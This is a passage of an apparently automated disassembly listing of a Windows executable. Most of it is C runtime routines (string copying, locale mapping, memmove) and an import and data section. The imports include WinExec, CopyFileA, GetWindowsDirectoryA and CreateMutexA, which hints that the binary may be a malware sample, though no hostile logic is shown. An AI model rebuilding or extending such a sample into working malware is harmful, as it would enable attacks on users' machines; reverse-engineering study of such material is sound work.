pop edi
retn
; ---------------------------------------------------------------------------
loc_404729: ; CODE XREF: sub_4046A0+A9�j
; sub_4046A0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4046E0
loc_404731: ; CODE XREF: sub_4046A0+20�j
; sub_4046A0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404729
test dl, dl
jz short loc_40477B
test dh, dh
jz short loc_404771
test edx, 0FF0000h
jz short loc_404767
test edx, 0FF000000h
jnz short loc_404729
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404767: ; CODE XREF: sub_4046A0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404771: ; CODE XREF: sub_4046A0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_40477B: ; CODE XREF: sub_4046A0+AD�j
xor edx, edx
mov [edi], edx
loc_40477F: ; CODE XREF: sub_4046A0+C5�j
; sub_4046A0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_404791
loc_404787: ; CODE XREF: sub_4046A0+79�j
xor eax, eax
loc_404789: ; CODE XREF: sub_4046A0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_404789
loc_404791: ; CODE XREF: sub_4046A0+E5�j
and ebx, 3
jnz short loc_40471B
loc_404796: ; CODE XREF: sub_4046A0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4046A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40479E proc near ; CODE XREF: sub_403B86+BE�p
; sub_403B86+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405488
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4070EC, edi
jnz short loc_404814
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_40543C
mov esi, 100h
push esi
push edi
call dword_40509C ; LCMapStringW
test eax, eax
jz short loc_4047F2
mov dword_4070EC, ebx
jmp short loc_404814
; ---------------------------------------------------------------------------
loc_4047F2: ; CODE XREF: sub_40479E+4A�j
push edi
push edi
push ebx
push offset dword_406F48
push esi
push edi
call dword_405098 ; LCMapStringA
test eax, eax
jz loc_40492C
mov dword_4070EC, 2
loc_404814: ; CODE XREF: sub_40479E+2E�j
; sub_40479E+52�j
cmp [ebp+arg_C], edi
jle short loc_404829
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4049C2
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404829: ; CODE XREF: sub_40479E+79�j
mov eax, dword_4070EC
cmp eax, 2
jnz short loc_404850
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_405098 ; LCMapStringA
jmp loc_40492E
; ---------------------------------------------------------------------------
loc_404850: ; CODE XREF: sub_40479E+93�j
cmp eax, 1
jnz loc_40492C
cmp [ebp+arg_18], edi
jnz short loc_404866
mov eax, dword_4070E4
mov [ebp+arg_18], eax
loc_404866: ; CODE XREF: sub_40479E+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40492C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048C1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4048C1: ; CODE XREF: sub_40479E+10E�j
cmp [ebp+var_24], edi
jz short loc_40492C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
test eax, eax
jz short loc_40492C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40492C
test byte ptr [ebp+arg_4+1], 4
jz short loc_404940
cmp [ebp+arg_14], edi
jz loc_4049BB
cmp esi, [ebp+arg_14]
jg short loc_40492C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
test eax, eax
jnz loc_4049BB
loc_40492C: ; CODE XREF: sub_40479E+66�j
; sub_40479E+B5�j ...
xor eax, eax
loc_40492E: ; CODE XREF: sub_40479E+AD�j
; sub_40479E+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404940: ; CODE XREF: sub_40479E+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404974
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_404974: ; CODE XREF: sub_40479E+1C2�j
cmp ebx, edi
jz short loc_40492C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
test eax, eax
jz short loc_40492C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_40499B
push edi
push edi
jmp short loc_4049A1
; ---------------------------------------------------------------------------
loc_40499B: ; CODE XREF: sub_40479E+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4049A1: ; CODE XREF: sub_40479E+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4050B0 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40492C
loc_4049BB: ; CODE XREF: sub_40479E+165�j
; sub_40479E+188�j
mov eax, esi
jmp loc_40492E
sub_40479E endp
; =============== S U B R O U T I N E =======================================
sub_4049C2 proc near ; CODE XREF: sub_40479E+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4049DF
loc_4049D2: ; CODE XREF: sub_4049C2+1B�j
cmp byte ptr [eax], 0
jz short loc_4049DF
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4049D2
loc_4049DF: ; CODE XREF: sub_4049C2+E�j
; sub_4049C2+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4049EA
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4049EA: ; CODE XREF: sub_4049C2+21�j
mov eax, edx
retn
sub_4049C2 endp
; =============== S U B R O U T I N E =======================================
sub_4049ED proc near ; CODE XREF: sub_403D68+1F�p
arg_0 = dword ptr 4
mov eax, dword_4070F4
test eax, eax
jz short loc_404A05
push [esp+arg_0]
call eax ; dword_4070F4
test eax, eax
pop ecx
jz short loc_404A05
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404A05: ; CODE XREF: sub_4049ED+7�j
; sub_4049ED+12�j
xor eax, eax
retn
sub_4049ED endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A10 proc near ; CODE XREF: sub_403E33+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404A30
cmp edi, eax
jb loc_404BA8
loc_404A30: ; CODE XREF: sub_404A10+16�j
test edi, 3
jnz short loc_404A4C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
loc_404A4C: ; CODE XREF: sub_404A10+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404A64
and eax, 3
add ecx, eax
jmp dword ptr loc_404A6C+4[eax*4]
; ---------------------------------------------------------------------------
loc_404A64: ; CODE XREF: sub_404A10+46�j
jmp dword ptr loc_404B68[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A6C: ; CODE XREF: sub_404A10+31�j
; sub_404A10+8E�j ...
jmp off_404AEC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404A80
dd offset loc_404AAC
dd offset loc_404AD0
; ---------------------------------------------------------------------------
loc_404A80: ; DATA XREF: sub_404A10+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404AAC: ; DATA XREF: sub_404A10+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; DATA XREF: sub_404A10+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AEC dd offset loc_404B4F ; DATA XREF: sub_404A10:loc_404A6C�r
dd offset loc_404B3C
dd offset loc_404B34
dd offset loc_404B2C
dd offset loc_404B24
dd offset loc_404B1C
dd offset loc_404B14
dd offset loc_404B0C
; ---------------------------------------------------------------------------
loc_404B0C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404B14: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404B1C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404B24: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404B2C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404B34: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404B3C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404B4F: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10:off_404AEC�o
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404B58 dd offset loc_404B68 ; DATA XREF: sub_404A10+35�r
; sub_404A10+92�r ...
dd offset loc_404B70
dd offset loc_404B7C
dd offset loc_404B90
; ---------------------------------------------------------------------------
loc_404B68: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404B70: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B7C: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404B90: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BA8: ; CODE XREF: sub_404A10+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404BDC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404BD0: ; CODE XREF: sub_404A10+1B1�j
; sub_404A10+208�j ...
neg ecx
jmp off_404CA0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404BDC: ; CODE XREF: sub_404A10+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404BF4
and eax, 3
sub ecx, eax
jmp dword ptr loc_404BF4+4[eax*4]
; ---------------------------------------------------------------------------
loc_404BF4: ; CODE XREF: sub_404A10+1D6�j
; DATA XREF: sub_404A10+1DD�r
jmp off_404CF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
or [eax+eax*2+0], cl
sub [eax+eax*2+0], cl
push eax
dec esp
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404CA4
dd offset loc_404CAC
dd offset loc_404CB4
dd offset loc_404CBC
dd offset loc_404CC4
dd offset loc_404CCC
dd offset loc_404CD4
off_404CA0 dd offset loc_404CE7 ; DATA XREF: sub_404A10+1C2�r
; ---------------------------------------------------------------------------
loc_404CA4: ; DATA XREF: sub_404A10+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404CAC: ; DATA XREF: sub_404A10+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404CB4: ; DATA XREF: sub_404A10+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404CBC: ; DATA XREF: sub_404A10+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404CC4: ; DATA XREF: sub_404A10+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404CCC: ; DATA XREF: sub_404A10+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404CD4: ; DATA XREF: sub_404A10+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404CE7: ; CODE XREF: sub_404A10+1C2�j
; DATA XREF: sub_404A10:off_404CA0�o
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404CF0 dd offset loc_404D00 ; DATA XREF: sub_404A10+1B7�r
; sub_404A10:loc_404BF4�r ...
dd offset loc_404D08
dd offset loc_404D18
dd offset loc_404D2C
; ---------------------------------------------------------------------------
loc_404D00: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D08: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D18: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D2C: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404A10 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D46 proc near ; CODE XREF: sub_401B08+33�p
jmp dword_405134
sub_404D46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D4C proc near ; CODE XREF: sub_401B08+24�p
jmp dword_40512C
sub_404D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D52 proc near ; CODE XREF: sub_401B08+7�p
jmp dword_405130
sub_404D52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D58 proc near ; CODE XREF: sub_403460+13�p
jmp dword_405080
sub_404D58 endp
; ---------------------------------------------------------------------------
align 10h
dd 0A8h dup(0)
dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B46+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F2E+13C�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_4020C8:loc_402134�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404518+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403DCA+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403B86+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_4037BC+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_4037BC+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_4037BC+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403E33+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_403277+166�r
dword_405098 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_40479E+A7�r
dword_40509C dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_40479E+14D�r ...
dword_4050A0 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_403669+143�r
dword_4050A4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050A8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050AC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_403145+E1�r
dword_4050B0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_40479E+20D�r
dword_4050B4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050BC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_403277+59�r
dword_4050C0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050C4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050C8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402BB0+91�r
dword_4050CC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050D0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050D4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050D8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 0 ; sub_401F2E+17F�r
align 10h
dword_4050F0 dd 0 dword_4050F4 dd 0 dword_4050F8 dd 0 dword_4050FC dd 0 dword_405100 dd 0 ; sub_40159E+2DD�r ...
dword_405104 dd 0 ; sub_401398+151�r ...
dword_405108 dd 0 ; sub_40127D+27�r ...
dword_40510C dd 0 ; sub_40127D+51�r ...
dword_405110 dd 0 ; sub_40127D+6C�r ...
dword_405114 dd 0 ; sub_40127D+10F�r ...
dword_405118 dd 0 dword_40511C dd 0 dword_405120 dd 0 ; sub_4011D5+7�r ...
dword_405124 dd 0 ; sub_4011D5+1E�r ...
dd 0
dword_40512C dd 0 dword_405130 dd 0 dword_405134 dd 0 align 10h
dword_405140 dd 0FFFFFFFFh, 4029B5h, 4029C9h, 746E7572h, 20656D69h
; DATA XREF: .text:004028E3�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DB4�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_403669+119�o
align 10h
asc_405400 db 0Ah ; DATA XREF: sub_403669+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_403669+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_403669+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_403669+7D�o
align 4
dword_40543C dd 0 ; sub_40479E+36�o
dword_405440 dd 0FFFFFFFFh, 4038B5h, 4038B9haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404613+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404613+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404613+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404613+D�o
align 4
dword_405488 dd 0FFFFFFFFh, 4048AEh, 4048B2h, 0FFFFFFFFh, 404962h, 404966h
; DATA XREF: sub_40479E+5�o
dd 560Ch, 2 dup(0)
dd 5674h, 50E0h, 5540h, 2 dup(0)
dd 576Ch, 5014h, 561Ch, 2 dup(0)
dd 577Ah, 50F0h, 552Ch, 2 dup(0)
db 0CCh
db 57h, 2 dup(0)
dd 5000h, 5614h, 2 dup(0)
dd 57F6h, 50E8h, 5658h, 2 dup(0)
dd 5836h, 512Ch, 5 dup(0)
dd 57BEh, 57ACh, 579Eh, 5786h, 0
dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C838DE8h, 7C80CCA8h
dd 7C812F39h, 7C80CC97h, 7C812F08h, 7C81CF5Bh, 7C80A0D4h
dd 7C814AE7h, 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh
dd 7C81CDDAh, 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h
dd 0
dd 7E41A8ADh, 0
dd 57DAh, 0
dd 80000073h, 80000002h, 8000000Dh, 80000001h, 80000010h
dd 80000013h, 80000009h, 80000017h, 80000004h, 80000003h
dd 80000039h, 8000000Ch, 8000000Bh, 80000034h, 0
dd 5814h, 5824h, 5802h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 10h
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 10h
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
